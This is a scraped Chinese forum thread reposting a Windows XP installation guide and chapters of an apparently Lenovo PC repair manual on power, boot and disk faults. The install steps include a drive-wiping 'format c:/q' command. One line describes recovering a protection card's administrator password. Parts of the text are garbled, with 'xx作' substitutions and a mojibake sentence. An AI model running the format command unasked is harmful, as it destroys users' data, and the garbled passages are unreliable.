                      然后，单击“下一步”，勾选“我接受许可协议”，再单击“下一步”，“Windows 安装管理器向导”关闭，“Windows
                  安装管理器”变为活动窗口。

                      下面的内容中我们可以看到，Windows安装向导所要收集的选项设置和用户信息，都可以在Windows安装管理器中找到。根据需要，设置默认名称和单位、产品密匙（序列号）、计算机名称、管理员密码、网络组件、工作组或域、安装文件夹等等信息后，执行菜单栏中的“文件”“保存”命令进行保存。

                      要注意的是，安装程序的应答文件通常是Unattend.txt（网络预安装除外），我们可以随意命名该文件。但是，因为我们在“Windows
                  安装管理器向导”中选择了“否，这个应答文件将用来从CD安装”，所以，在这里一定要把应答文件保存为“Winnt.sif”。

                      把“Winnt.sif”文件复制到一张格式化好的空白软盘上，当须要重新安装Windows
                  XP时，在BIOS中把启动方式设置为从CD-ROM优先启动，然后插好软盘和Windows
                  XP的安装光盘，就可以放心离开电脑去做其他事，无须操心系统安装过程了

                  如何安装系统

                  一：dos下安装系统
                  首先第一部修改CMOS设置使机子进入光驱引导,具体说明如下:
                  启动计算机
                  马上按住del键
                  进入BIOS或BOOT项(机子不同,厂家的设置不一定相同,但是原理一样
                  下面以BIOS为例:
                  选advanced bios features setup
                  下面会出现几个选项:
                  First　 Bootup Device HDD-0 (HDD指硬盘
                  Secand　 Bootup Device CDROM (指光驱
                  Third　 Bootup Device Floppy (指软驱
                  (意思是系统第一第二第三启动
                  别的不用管选中
                  First　 Bootup Device HDD-0(把HDD-0改成CDROM)
                  即可实现光驱启动
                  然后按　 Esc 返回上一菜单
                  选着SAVE@EXIT SETUP(储存并退出设置)
                  注:EXIT WITHOVT SAVE(沿用原有设置并退出)
                  第二步安装系统
                  重启放入光盘
                  在出现Please enter any key boot CD.....时按任意键即可进入光盘启动
                  把98或XP光盘放到光驱中中，系统读盘后显示盘符
                  默认的是A:>
                  先格盘
                  A:>d:
                  d:>format c:/q(快速格式c盘
                  然后选Y 就可以格式完毕最后显示
                  d:>
                  D:>j转到光盘所在的盘符如j，输入后回车）
                  J:>cd xx(xx为安装目录,如果没有 可以省略)
                  J:>xx>SETUP(执行安装
                  进入安装画面 呵呵后面的 都是 中文的 大家都应该明白了.
                  d:
                  d:>format c:/q(快速格式c盘
                  然后选Y 就可以格式完毕最后显示
                  d:>
                  d:>H所拷贝的盘符)
                  H:>CD i386（进入光盘I386目录，如果你是下载的XP，且假设XP文件解压缩目录为
                  F:>WINXP下，那么这个时候应进入目录为F:>winxp\I386,方法是先从A盘切换到F盘
                  ，然后F:>cd winxp　 F:>winxp\cd i386）
                  H:>i386>winnt（如上，此时则是F:>winxp\i386\winnt，运行WINNT命令，准备执行安装程序）
                  按回车后，屏幕提示用户确认安装源路径，直接回车即可。
                  接下来系统复制文件到临时的目录中，复制完后系统重新启动，等待片刻，进入安装界面。
                  接下来的操作和用光驱启动安装完全相同，简直是傻瓜似的操作，很简单的^_^>>
                  复制完毕重启,这个时候可以取出光盘,还是按Del还是按上面第一布的方法修改
                  First　 Bootup Device CDROM(把CDROM改成HDD-0)
                  在重启即可进入安装.
                  双系统最好先安98在安xp,xp就可以在98系统下安装了(注:要 选完全安装

                  如何安装系统2


电脑维修步骤与维修xx作注意事项

《一键清理系统垃圾》

电脑维修步骤与维修xx作注意事项

              §2.1 电脑维修步骤
              对电脑进行维修，应遵循如下步骤：
              一、了解情况
              即在服务前，与用户沟通，了解故障发生前后的情况，进行初步的判断。如果能了解到故障发生前后尽可能详细的情况，将使现场维修效率及判断的准确性得到提高。了解用户的故障与技术标准是否有冲突。

              向用户了解情况，应借助第二部分中相关的分析判断方法，与用户交流。这样不仅能初步判断故障部位，也对准备相应的维修备件有帮助。
              二、复现故障
              即在与用户充分沟通的情况下，确认：
              1. 用户所报修故障现象是否存在，并对所见现象进行初步的判断，确定下一步的xx作；
              2. 是否还有其它故障存在。
              三、判断、维修
              即对所见的故障现象进行判断、定位，找出产生故障的原因，并进行修复的过程。在进行判断维修的过程中，应遵循下面一节“维修判断”中所述的原则、方法、注意事项，及第二、三部分所述内容进行xx作。

              四、检验
              1.
              维修后必须进行检验，确认所复现或发现的故障现象解决，且用户的电脑不存在其它可见的故障。电脑整机正常的标准，参见《联想台式电脑整机检验规范》；

              2. 必须按照《XX维修检验确认单》所列内容，进行整机验机，尽可能消除用户未发现的故障，并及时排除之。
              §2.2 电脑维修xx作
              在维修过程中，下列各条款应引起切实的关注和注意。
              一、在进行故障现象复现、维修判断的过程中，应避免故障范围扩大；
              二、在维修时，须查验、核对装箱单及配置；
              三、必须充分地与用户沟通。了解用户的xx作过程、出故障时所进行过的xx作、用户使用电脑的水平等。
              四、维修中第一要注意的就是观察——观察、观察、再观察！！！
              1.
              周围环境：电源环境、其它高功率电器、电、磁场状况、机器的布局、网络硬件环境、温湿度、环境的洁净程度；安放电脑的台面是否稳固。周边设备是否存在变形、变色、异味等异常现象；

              2.
              硬件环境：机箱内的清洁度、温湿度，部件上的跳接线设置、颜色、形状、气味等，部件或设备间的连接是否正确；有无错误或错接、缺针/断针等现象；用户加装的与机器相连的其它设备等一切可能与机器运行有关的其它硬件设施；

              3. 软件环境：
              A. 系统中加载了何种软件、它们与其它软、硬件间是否有冲突或不匹配的地方；
              B.
              除标配软件及设置外，要观察设备、主板及系统等的驱动、补丁是否安装、是否合适；要处理的故障是否为业内公认的BUG或兼容问题；用户加装的其它应用与配置是否合适；

              4. 加电过程中的观察：元器件的温度、异味、是否冒烟等；系统时间是否正确；
              5. 拆装部件时的观察：要有记录部件原始安装状态的好习惯，且要认真观察部件上元器件的形状、颜色、原始的安装状态等情况；
              6. 观察用户的xx作过程和习惯，及是否符合要求等。
              五、在维修前，如果灰尘较多，或怀疑是灰尘引起的，应先除尘
              六、对于自己不熟悉的应用或设备，应在认真阅读用户使用手册或其它相关文档后，才可动手xx作。
              七、平时要多注意通过《技术直通车》、《技术工程信息通报》等下发的技术资料及其他工程师们的经验来积累自己的经验和提高维修水平。
              八、禁止维修工程师为用户安装地线。如用户要安装地线，请用户联系正式电工为其安装。
              九、如果要通过比较法、替换法进行故障判断的话，应先征得用户的同意。
              十、在进行维修判断的过程中，如有可能影响到用户所存储的数据，一定要在做好备份、或保护措施、并征得用户同意后，才可继续进行。
              十一、当出现大批量的相似故障（不仅是可能判断为批量的故障）时，一定要对周围的环境、连接的设备，以及与故障部件相关的其它部件或设备进行认真的检查和记录，以找出引起故障的根本原因。

              十二、随机性故障的处理思路。随机性故障是指：随机性死机、随机性报错、随机性出现不稳定现象。对于这类故障的处理思路应该是：
              1.
              慎换硬件，特别是上门服务时。一定要在充分的软件调试和观察后，在一定的分析基础上进行硬件更换。如果没有把握，最好在维修站内进行硬件更换xx作。

              2. 以软件调整为主。调整的内容有：
              1） 设置BIOS为出厂状态（注意BIOS开关位置）
              2） 查杀病毒
              3） 调整电源管理
              4） 调整系统运行环境
              5） 必要时做磁盘整理，包括磁盘碎片整理、无用文件的清理及介质检查（注意，应在检查磁盘分区正常及分区中空余空间足够的情况下进行）。
              6） 确认有无用户自加装的软硬件，如果有，确认其性能的完好性/兼容性。
              7）
              与无故障的机器比较、对比。这种对比的一种方法是，在一台配置与故障机相同的无故障机器上，逐个插入故障机中的部件（包括软件），查看无故障机的变化，当在插入某部件后，无故障机出现了与故障机类似的现象，可判该部件有故障。注意这种方式的对比，应做得彻底，以防漏掉可能有两种部件引起同一故障的情况。

              十三、应努力学习相关技术知识、掌握xx作系统的安装、使用方法及配置工具的使用等；理解各配置参数的意义与适用的范围。
              十四、请求支持需要关注的内容
              1. 硬件及配置信息（尽可能详尽）
              2. 软件及配置信息（尽可能详尽）
              3. 周围环境
              4. 完整的故障现象描述。即用户第一次报修时的故障现象，经过维修xx作后故障现象的变化情况。（清晰的描述）
              5. 做过的维修xx作（要详尽）
              §2.3 电脑维修的基本思路
              为帮助维修工程师，顺利找到第二部分中的相关内容，在这里列出基本的判断思路，供参考使用。

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:51:35新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第5楼

               常见故障判断－－－ 加电类故障
              一、定义举例
              从上电（或复位）到自检完成这一段过程中电脑所发生的故障。
              二、可能的故障现象
              1、 主机不能加电（如：电源风扇不转或转一下即停等）、有时不能加电、开机掉闸、机箱金属部分带电等；
              2、 开机无显，开机报警；
              3、 自检报错或死机、自检过程中所显示的配置与实际不符等；
              4、 反复重启；
              5、 不能进入BIOS、刷新BIOS后死机或报错；CMOS掉电、时钟不准；
              6、 机器噪音大、自动（定时）开机、电源设备问题等其它故障。
              三、可能涉及的部件
              市电环境；电源、主板、CPU、内存、显示卡、其它可能的板卡；BIOS中的设置（可通过放电来回复到出厂状态）；开关及开关线、复位按钮及复位线本身的故障。

              四、判断要点/顺序。
              以下的文字叙述部分是对维修判断流程的补充和说明，要结合流程图来阅读。另外，本章只分析加电类的故障，如果在判断中涉及其它类故障，可转入相应故障的判断过程。以下各类同。

              1、 维修前的准备
              1) POST卡；
              2) 万用表；
              3) 试电笔；
              4) CPU负载。
              2、 环境检查
              1) 检查电脑设备：
              A. 周边及电脑设备内外是否有变形、变色、异味等现象；
              B. 环境的温、湿度情况；
              C. 加电后，注意部件、元器件及其它设备是否变形、变色、异味、温度异常等现象发生。
              2) 检查市电情况：
              A. 检查市电电压是否在220V±10%范围内，是否稳定（即是否有经常停电、瞬间停电等现象）；
              B. 市电的接线定义是否正确（即，左零右火、不允许用零线作地线用（现象是零地短接）、零线不应有悬空或虚接现象）；
              C. 供电线路上是否接有漏电保护器（且必须接地火线上），是否有地线等；
              D.
              主机电源线一端是否牢伤心地插在市电插座中，不应有过松或插不到位的现象，另一端是否可伤心在接在主机电源上，不应有过松或插不到位的情况。

              3) 检查电脑内部连接：
              A. 电源开关可否正常的通断，声音清晰，无连键、接触不良现象；
              B. 其它各按钮、开关通断是否正常；
              C. 连接到外部的信号线是否有断路、短路等现象；
              D. 主机电源是否已正确地连接在各主要部件，特别是主板的相应插座中；
              E. 板卡，特别是主板上的跳接线设置是否正确。
              4) 检查部件安装：
              A. 检查机箱内是否有异物造成短路；
              B. 或零部件安装上是否造成短路（如P4CPU风扇在主板背面的支架安装错位造成的短路等）；
              C.
              通过重新插拔部件（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查部件安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；

              D. 检查内存的安装，要求内存的安装总是从第一个插槽开始顺序安装。如果不是这样，请重新插好。
              5) 检查加电后的现象：
              A. 按下电源开关或复位按钮时，观察各指示灯是否正常闪亮；
              B. 风扇（电源的和CPU的等）的工作情况，不应有不动作或只动作一下即停止的现象；
              C. 注意倾听风扇、驱动器等的电机是否有正常的运转声音或声音是否过大；
              D.
              主机能加电，但无显示，应倾听主机能否正常自检（即有自检完成的鸣叫声，且硬盘灯能不断闪烁）若有，先检查显示系统是否有故障，否则检查主机问题；

              E.
              对于开机噪音大的问题，应分辨清噪音大的部位，一般情况下，噪音大的部件有风扇、硬盘、光驱和软驱动机械部件。对于风扇，应通过除尘来检查，如果噪音减小，可在风扇轴处滴一些钟表油，以加强润滑。

              3、 故障判断要点
              1) 检查主机电源：
              A. 主机电源在不接负载时，将电源到主板的插头中绿线与黑线直接短接，看能否加电，并用万用表检查是否有电压输出；
              B. 用万用表检查输出的各路电压值是否在规格允许的范围内；
              C. 在接有负载的情况下，用万用表检查输出电源的波动范围是否在超出允许范围；
              D. 对于电源一加电，只动作一下即停止工作的情况，应首先判断电源空载或接在其它机器上是否能正常工作（即检查上面提到的三点）；
              E. 如果电脑的供电不是直接从市电来，而是通过稳压设备获得，要注意用户所用的稳压设备是否完好、或是否与我们的产品的电源兼容。
              2) 在开机无显时，用POST卡检查硬件最小系统中的部件是否正常
              A. 查看POST显示的代码是否为正常值（参见《维修工具使用手册》中的代码定义）；
              B. 对于POST卡所显示的代码，应检查与之相关的所有部件。如显示的代码与内存有关，就应检查主板和内存；
              C. 倾听在硬件最小系统下，有无报警声音，若无检查的重点应在最小系统中的部件上；
              D.
              检查中还应注意的是，当硬件最小系统有报警声时，要求插入无故障的内存和显示卡（集成显示卡除外），若此时没有报警音，且有显示或自检完成的声音，证明硬件最小系统中的部件基本无故障，否则，应主要检查主板；

              E.
              在准备更换CPU来检查时，应先使用CPU负载，检查主板的供电电压是否在允许范围内，在电压正常的情况下才可进行CPU更换xx作。如果超出范围，直接更换主板。CPU电压允许值参见《维修工具使用手册》；

              3) 部件的检查：
              A. 如果硬件最小系统中的部件经POST卡检查正常后，要逐步加入其它的板卡及设备，以检查其中哪个部件或设备有问题；
              B. 对于总是通过重新插拔来解决加电故障的部件，应检查部件的后档板尺寸是否不太合适，这可通过去掉后档板检查。
              4) BIOS设置检查：
              A. 通过清CMOS检查故障是否消失；
              B. BIOS中的设置是否与实际的配置不相符（如：磁盘参数、内存类型、CPU参数、显示类型、温度设置等）；
              C. 根据需要更新BIOS检查故障是否消失。
              5) 其它方面的检查：
              A.
              在接有漏电保护器的环境中，一定要先检查市电插座上的接线是否正确（即按左零右火，上地的连接方法；零地线不可短接；零线不能悬空），再检查漏电保护器是否正确地接在火线上、容量是否过小，接着检查在一路市电线路上所接的设备的数量（特别是电脑的数量——在漏电保护器的动作电流为30mA时，应可接16~20台电脑），最后检查整机设备中有无漏电或漏电流过大的现象；

              B.
              检查用户环境中有无地线。在无地线的环境中，触摸主机的金属部分，会有麻手的感觉。这时，如果接地后，机器可正常运行，且麻手现象消失，则属正常现象，不是故障；

              C. 对于不能进BIOS，或不能刷新BIOS的情况，可先考虑主板的故障；
              D. 对于反复重启或关机的情况，除注意市电的环境（如插头是否插好等）外，要注意电源或主板是否有故障；
              E. 系统中是否加载有第三方的开关机控制软件，有应予以卸载。
              见附录一之（一）。
              六、案例
              案例一：
              问题描述：双子恒星6C/766的机器，主板是精英P6SEP-ME V2.2D，当内存不插在DIMM1时，开机无显示，但机器不报警。
              解决方案：经测试，当DIMM1上不插内存时，即使DIMM2、DIMM3都插上内存，开机也是无显。当DIMM1插上内存时，不管DIMM2、DIMM3上是否插有内存，开机正常。

              查询早期的周报得知，此问题是由于此机型集成的显卡使用的显存是共享物理内存的，而显存所要求的物理内存是要从插在DIMM1上内存中取得，当DIMM1上没有插内存时，集成显卡无法从物理内存中取得显存，故用户开机时无显。

              案例二：
              问题描述：每次计算机开机自检时，系统总会在显示512K Cache的地方停止运行了，是什么原因？
              解决方案：首先既然在显示缓存处死机，必然是该处或其后的部分有问题。记得平常开机，此项显示完后就轮到硬盘启动xx作系统了。因此，可以断定不是高速缓存的问题，就是硬盘的故障。取下硬盘安装到别的电脑上，证实硬盘是好的。这是检查计算机故障最常用的办法——替换排除法。

              现在我们把注意力集中到高速缓存上，进入CMOS设置，禁止L2 Cache，存盘退出，重启机器，电脑就可以正常工作了，可以断定是L2
              Cache的问题。
              触摸主板上的高速缓存芯片，发现有些芯片很热，估计就是这儿的问题。再次确认问题所在没错。
              触类旁通：若发现机器总死机，可运行一会后，用手触摸主板上的高速缓存芯片，发现烫手，就可在Cmos中关闭二级缓存，发现是否死机，最后定义故障所在。

              案例三：
              问题描述：用户使用T启天2600 P4 1.6G 12840DSF(特5409)计算机，开机无显示，用户现在咨询如何解决？
              解决方案：检查用户的环境，发现用户机随机附带两块显卡——主板集成一个显卡另外还有一块单独的TNT2 M64
              32M显卡，有些客户在刚刚购买电脑时由于对电脑不太熟悉，将显示器信号线接到了主板集成的显卡接头上，这样会导致开机无显，但是此时主机工作正常。

              遇到用户报修开机无显或显示器故障，请提示客户检查环境，若有不正确，提示更正后，问题即可解决。
              [此贴子已经被作者于2004-1-28 17:11:26编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:52:15新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第6楼

               常见故障判断－－－ 启动与关闭类故障
              一、定义举例
              与启动、关闭过程有关的故障。启动是指从自检完毕到进入xx作系统应用界面这一过程中发生的问题；关闭系统是指从点击关闭按扭后到电源断开之间的所有过程。

              二、可能的故障现象
              1、 启动过程中死机、报错、黑屏、反复重启等；
              2、 启动过程中报某个文件错误；
              3、 启动过程中，总是执行一些不应该的xx作（如总是磁盘扫描、启动一个不正常的应用程序等）；
              4、 只能以安全模式或命令行模式启动；
              5、 登录时失败、报错或死机；
              6、 关闭xx作系统时死机或报错。
              三、可能涉及的部件
              BIOS设置、启动文件、设备驱动程序、xx作系统/应用程序配置文件；电源、磁盘及磁盘驱动器、主板、信号线、CPU、内存、可能的其它板卡。

              四、判断要点/顺序
              1、 维修前的准备
              1) 磁盘数据线；
              2) 万用表；
              3) 查毒软件。
              2、 环境检查
              1) 机器周边及外观检查：
              A. 市电连接是否牢伤心，不应有过松或插不到位的现象；
              B. 主机硬盘指示灯是否正确闪亮，不应有不亮或常亮的现象；
              C. 观察系统是否有异味，元器件的温度是否偏高；
              D. 观察CPU风扇的转速是否不够，或是否过慢或不稳定；
              E. 倾听驱动器工作时是否有异响。
              2) 驱动器连接检查：
              A. 驱动器的电源连接是否正确、牢伤心。驱动器上的电源连接插座是否有虚接的现象；
              B. 驱动器上的跳线设置是否与驱动器连接在电缆上的位置相符；
              C. 驱动器数据电缆是否接错或漏接，规格是否与驱动器的技术规格相符（如：支持DMA66的驱动器，必须使用80芯数据电缆）；
              D. 驱动器数据电缆是否有故障（如露出芯线、有死弯或硬痕等），除可通过观察来判断外，也可通过更换一根数据电缆来检查；
              E. 驱动器是否通过其它板卡连接到系统上，或通过其它板卡（如硬盘保护卡，双网隔离卡等）来控制。
              3) 检查其它部件的安装：
              A.
              通过重新插拔部件（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查部件安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；

              B. 检查CPU风扇与CPU是否接触良好。最好重新安装一次。
              4) 显示的内容的观察：要注意屏幕报错的内容、死机的位置，以确定故障可能发生的部位。
              3、 故障判断要点
              1) 充分地与用户沟通，了解出现不能启动的过程及用户的xx作；
              2) BIOS设置检查：
              A.
              是否为刚更换完不同型号的硬件。如果主板BIOS支持BOOTEasy功能或BIOS防写开关打开，则建议将其关闭，待完成一次完整启动后，再开启；

              B.
              是否添加了新硬件。这时应先去除添加的硬件，看故障是否消失，若是，检查添加的硬件是否有故障，或系统中的设置是否正确（通过对比新硬件的使用手册检查）；

              C. 检查BIOS中的设置，如：启动顺序、启动磁盘的设备参数等。建议通过清CMOS来恢复；
              D.
              检查是否由于BIOS问题（包括设置及功能）引起xx作系统不能正常启动或关闭，可偿试将Windows目录下的BIOS.vxd（或VPBIOSD.vxd）改名为BIOS.old，然后重启，或关闭，若故障消失，则通过修改BIOS设备或更新BIOS来解决，否则与BIOS无关。注意测试完成以后，一定要将其改回原来的名字（注：除Windows
              98外，其它xx作系统无此文件）；
              E.
              在某些特殊情况下，应考虑升级BIOS来检查。如：对于在第一次开机启动后，某些应用或设备不能工作的情况，除检查设备本身的问题外，就可考虑更新BIOS来解决。

              以下检查应在软件最小系统下进行。
              3) 磁盘逻辑检查：
              A. 根据启动过程中的错误提示，相应地检查磁盘上的分区是否正确、分区是否激活、是否格式化；
              B. 直接检查硬盘是否已分区、格式化；
              C.
              加入一个其它无故障的驱动器（如软驱或光驱）来检查能否从其它驱动器中启动（若使用软驱，最好使用希捷的检测软盘启动）。若能，进行第3）、4）步的检查，否则进行第5）步的检查；接着、分区是否激活、有无坏道等；

              D. 硬盘上的启动分区是否已激活，其上是否有启动时所用的启动文件或命令；
              E.
              检查硬盘驱动器上的启动分区是否可访问，若不能，用相应厂商的磁盘检测程序检查硬盘是否有故障。有故障，更换硬盘；在无故障的情况下，通过初始化硬盘来检测，若故障依然存在，更换硬盘；

              F.
              在用其它驱动器也不能启动时，先将硬盘驱动器去除，看是否可启动，若仍不能，应对软件最小系统中的部件进行逐一检查，包括硬盘驱动器和磁盘传输的公共部件——磁盘接口、电源、内存等。若可启动了，最好对硬盘进行一次初始化xx作，若故障不消失，则再更换硬盘；

              G. 如果要对硬盘进行初始化xx作，但用户存有有用数据，建议用户找数据修复公司解决。
              4) xx作系统配置检查：
              A. 对于出现文件错误的提示，应按照在第一部分中提到的相应软件调试方法来修复文件；
              B.
              在不能启动的情况，建议进行一次“选择上一次启动”或用scanreg.exe恢复注册表到前期备份的注册表的方法检查故障是否能够消除；
              C.
              检查系统中有无第三方程序在运行，或系统中不当的设置或设备驱动引起启动不正常。在这里特别要注意Autoexec.bat和Config.sys文件，应屏蔽这两个文件，检查启动故障是否消失；

              D. 检查启动设置、启动组中的项、注册表中的键值等，是否加载了不必要的程序；
              E. 检查是否存在病毒。要求在一个系统中，只能安装一个防病毒软件；
              F. 必要时，通过一键恢复、恢复安装等方法，检查启动方面的故障；
              G.
              当启动中显示不正常时（如黑屏、花屏等），应按显示类故障的判断方法进行检查，但首先要注意显示设备的驱动程序是否正常、显示设置是否正确，最好将显示改变到标准的VGA方式检查。

              5) 硬件部件检查：
              A. 如果启动的驱动器是通过另外的控制卡连接的，请将驱动器直接连接在缺省的驱动器接口（主板上的）；
              B. 当在软件最小系统下启动正常后，应逐步回复到原始配置状态，来定位引起不能正常启动的部件；
              C. 要注意检查电源的供电能力，即输出电压是否在允许的范围内，波动范围是否超出允许的范围（参见《维修工具使用手册》）；
              D. 驱动器的检查，可参考磁盘类故障的判断方法进行；
              E.
              硬件方面的考虑，应从内存开始考虑：使用内存检测程序进行判断内存部分是否有故障，内存安装的位置，应从第一个内存槽开始安装，对于安装的多条内存检查内存规格是否一致、兼容等。有关内存规格请参阅附录二的相关部分。

              6) 对于不能正常关机的现象，应从下列几个方面检查：
              A.
              在命令提示符下查看BOOTLOG.TXT文件（在根目录下）。此文件是开机注册文件，它里面记录了系统工作时失败的记录，保存一份系统正常工作时的记录，与出问题后的记录相比较，找出有问题的驱动程序，在WIN.INI
              SYSTEM.INI 中找到该驱动对应的选项，或在注册表中找到相关联的对应键值，更改或升级该驱动程序，有可能将问题解决；
              B. 升级BIOS到最新版本，注意CMOS的设置（特别是APM、USB、IRQ等）；
              C. 检查是否有一些系统的文件损坏或未安装（参阅附录二之（三）的相关内容）
              D. 应用程序引起的问题，关闭启动组中的应用程序，检查关机时的声音程序是否损坏；
              E. 检查是否有某个设备引起无法正常关机，比如网卡、声卡，可通过更新驱动或更换硬件来检查；
              F. 通过安装补丁程序或升级xx作系统进行检查；
              G. 对于Windows 98SE系统的关机问题，请参阅附录二之（三）。其中的一引起论述对于其它Windows系统也有帮助。
              五、本类故障的判断流程
              见附录一之（二）。
              六、案例
              案例一：
              问题描述：客户计算机安装WIN 2000 PROFESSIONALxx作系统，每次启动均蓝屏，报MEMORY ERROR。
              解决方案：到达客户处，故障复现，向客户了解情况，客户反映发生故障前曾经安装过一根内存条，之后发生此类故障。关蟀蜗履诖嫣酰匦驴跃衫镀粒遣辉俦∕EMORY
              ERROR。考虑到WIN
              2000对硬件要求较高，而且故障是在加装内存后出现的故障，基本可以断定机器的原配硬件和软件系统没有问题。再次重新启动计算机，开机时按下F8键，选择进入“VGA模式”，此次计算机能够正常启动，并且登陆正常。在进行了一次正常登陆后，重新启动到标准模式，计算机启动正常，至此，故障排除。

              案例二：
              问题描述：客户机器被运行一段恶意程序，导致每次启动后均出现一个对话框，且该对话框无法关闭，只能强制结束，客户机器有重要程序，不愿意重新安装xx作系统。

              解决方案：首先怀疑是否是病毒，运行常用杀毒软件均不能查杀。在“开始”――“运行”中输入“MSCONFIG”，但是在“启动”组中仍然不能找到该程序。运行“SCANREG”，将注册表恢复到最老的版本故障依旧。最后只好手工编辑注册表，运行“REGEDIT”，在“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

              \CurrentVersion\RUN下，找到对应的程序文件名，删除对应的键值后，重新启动，故障排除。（注：建议在更改注册表前，使用注册表编辑器的“导出”功能进行注册表备份。）

              [此贴子已经被作者于2004-1-28 17:11:43编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:52:57新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第7楼

               常见故障判断－－－ 磁盘类故障
              一、定义举例
              这里所指的磁盘类故障表示两个方面：一是硬盘、光驱、软驱及其介质等引起的故障；另一是影响对硬盘、光驱、软驱访问的部件（如主板、内存等）引起的故障。

              二、可能的故障现象
              1、 硬盘驱动器
              1) 硬盘有异常声响，噪音较大；
              2) BIOS中不能正确地识别硬盘、硬盘指示灯常亮或不亮、硬盘干扰其它驱动器的工作等；
              3) 不能分区或格式化、硬盘容量不正确、硬盘有坏道、数据损失等；
              4) 逻辑驱动器盘符丢失或被更改、访问硬盘时报错；
              5) 硬盘数据的保护故障；
              6) 第三方软件造成硬盘故障；
              7) 硬盘保护卡引起的故障。
              2、 软盘驱动器
              1) 软驱指示灯不亮或常亮、软驱读盘声音大；
              2) 软驱划盘、软盘不能弹出或插入等；
              3) 软盘不能被格式化、软驱不读盘、软驱干扰其它驱动器或设备或应用的正常工作等；
              4) 在一个软驱中写的文件不能在另一个软驱中读出；
              5) 软驱盘符丢失或被更改、访问软驱时报错；
              6) 软驱安装不到位。
              3、 光盘驱动器
              1) 光驱噪音较大、光驱划盘、光驱托盘不能弹出或关闭、光驱读盘能力差等；
              2) 光驱盘符丢失或被更改、系统检测不到光驱等；
              3) 访问光驱时死机或报错等；
              4) 光盘介质造成光驱不能正常工作。
              三、可能涉及的部件
              硬盘、光驱、软驱及其它们的设置，主板上的磁盘接口、电源、信号线。
              四、判断要点/顺序
              1、 维修前的准备
              1) 磁盘数据线；
              2) 相应的磁盘检测软件；
              3) 查毒软件等。
              2、 硬盘驱动器
              1) 环境检查
              A. 检查硬盘连接：
              a) 硬盘上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
              b) 连接硬盘的数据线是否接错或接反；
              c) 硬盘连接线是否有破损或硬折痕。可通过更换连接线检查；
              d) 硬盘连接线类型是否与硬盘的技术规格要求相符；
              e) 硬盘电源是否已正确连接，不应有过松或插不到位的现象。
              B. 硬盘外观检查：
              a) 硬盘电路板上的元器件是否有变形、变色，及断裂缺损等现象；
              b) 硬盘电源插座之接针是否有虚焊或脱焊现象；
              c) 加电后，硬盘自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
              d) 加电后，要倾听硬盘驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
              C. 硬盘的供电检查：
              a) 供电电压是否在允许范围内，波动范围是否在允许的范围内等。
              2) 故障判断要点
              A. 建议在软件最小系统下进行检查，并判断故障现象是否消失。这样做可排除由于其它驱动器或部件对硬盘访问的影响。
              B. 参数与设置检查：
              a) 硬盘能否被系统正确识别，识别到的硬盘参数是否正确；BIOS中对IDE通道的传输模式设置是否正确（最好设为“自动”）；
              b)
              显示的硬盘容量是否与实际相符、格式化容量是否与实际相符（注意，一般标称容量是按1000为单位标注的，而BIOS中及格式化后的容量是按1024为单位显示的，二者之间有3%~5%的差距。另格式化后的容量一般会小于BIOS中显示的容量）。硬盘的容量根据系统所提供的功能（如带有一键恢复），应比实际容量小很多，缩小的值请参看用户手册中的相关说明；

              c) 检查当前主板的技术规格是否支持所用硬盘的技术规格，如：对于大于8GB硬盘的支持、对高传输速率的支持等；
              C. 硬盘逻辑结构检查：参考启动类故障判断要点中的相关部分。
              a) 检查磁盘上的分区是否正常、分区是否激活、是否格式化、系统文件是否存在或完整；
              b) 对于不能分区、格式化xx作的硬盘，在无病毒的情况下，应更换硬盘。更换仍无效的，应检查软件最小系统下的硬件部件是否有故障；
              c) 必要时进行修复或初始化xx作，或完全重新安装xx作系统；
              D. 系统环境与设置检查：参考启动类故障判断要点中的相关部分。
              a) 注意检查系统中是否存在病毒，特别是引导型病毒（如用查KV3000 /K命令，或用MEM.EXE命令等进行检查）；
              b) 认真检查在xx作系统中有无第三方磁盘管理软件在运行；设备管理器中对IDE通道的设置是否恰当；
              c) 是否开启了不恰当的服务。在这里要注意的是，ATA驱动在有些应用下可能会出现异常，建议将其卸载后查看异常现象是否消失；
              E. 硬盘性能检查：
              a)
              当加电后，如果硬盘声音异常、根本不工作或工作不正常时，应检查一下电源是否有问题、数据线是否有故障、BIOS设置是否正确等，然后再考虑硬盘本身是否有故障；

              b) 应使用相应硬盘厂商提供的硬盘检测程序检查硬盘是否有坏道或其它可能的故障；
              F. 对于关于硬盘保护卡所引起的问题，应从以下几方面考虑：
              a)
              安装硬盘保护卡，应注意将CMOS中的病毒警告关闭、将CMOS中的映射地址设为不使用（disable）、将CMOS中的第一启动设备为设为LAN；光驱和硬盘应接在不同的IDE数据线上。

              b)
              如果忘记的硬盘保护卡的管理员密码，对于1.0版ALT+133，ALT+144，ALT+155，弹出10组数（必须用小键盘），对于3.0版，在管理员密码处输入ENPQ，得到一组数据，然后拨打800，来得到密码；

              c) 装有硬盘保护卡的机器，开机出现红屏现象，应使用专用的工具程序解决。方法请参阅相关的《技术工程信息通报》；
              d)
              对于在某个引导盘下，看不到某些数据盘的情况，要检查：这些数据盘是否为该引导盘专属的数据盘；分区类型是否为引导盘的xx作系统所识别；在大于8GB的硬盘上，在8GB之后是否建立了属于该引导盘的FAT16分区（当然引导盘支持FAT16文件系统）；该引导盘的专属分区是否多于3
              个；
              e)
